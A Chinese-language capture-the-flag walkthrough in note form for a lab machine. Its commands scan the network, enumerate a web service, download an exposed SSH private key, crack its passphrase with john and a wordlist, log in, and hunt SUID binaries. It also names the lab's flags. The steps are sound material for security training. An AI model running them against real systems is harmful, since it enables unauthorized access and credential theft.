探测靶场IP{
netdiscover -r ip/netmask;
netdiscover -r 192.168.31.0/24;
192.168.31.97 08:00:27:e2:b8:c0 1 60 PCS Systemtechnik GmbH;
192.168.31.173 08:00:27:3d:18:b2 2 84 PCS Systemtechnik GmbH;
192.168.31.228 08:00:27:c1:98:fe 2 84 PCS Systemtechnik GmbH;
网络联通性检测:
ping;
均能 ping 通;
}
信息探测{
nmap -sV 192.168.31.97;
观察结果中存在这一行:
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3);
针对特殊端口进行探测,尤其对开放大端口的http服务进行排查;
可以使用浏览器:
http://192.168.31.97:31337/;
查看源代码进行更深入的信息;
使用 dirb 探测隐藏文件:
dirb http://192.168.31.97:31337/;
发现了 robots.txt 查看不允许搜索引擎探测的文件及信息{
发现 http://192.168.31.97:31337/taxes;
获得第一个flag!!!:
flag1{make_america_great_again};
}
}
ssh{
详见:https://blog.csdn.net/csm201314/article/details/78453579;
登录到远程服务器;
验证方式:
id_rsa: 私钥;
id_rsa.pub: 公钥;
思考:是否存在/id_rsa文件:
http://192.168.31.97:31337/.ssh/id_rsa;
chmod 600 id_rsa;
ssh -i id_rsa simon@192.168.31.97;
解密ssh私钥信息{
使用ssh2john 将id_rsa密钥信息转换为john可以识别的信息;
chmod 600 id_rsa;
ssh2john id_rsa > isacrack{
ssh2john本身并不是kali自带的程序,可以在github上进行下载;
https://github.com/magnumripper/JohnTheRipper/;
}
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules isacrack;
获得password: starwars;
登录后:
ls
并没有发现flags文件;
cd /root;
cat read_message.c;
获得第二个flag: flag2{use_the_source_luke};
find / -perm -4000 2>/dev/null //避免错误输出;
观察read_message.c,又发现存在具有root权限的可执行文件read_message;
利用缓冲区溢出,获得flag值: flag3{das_bof_meister};
}
}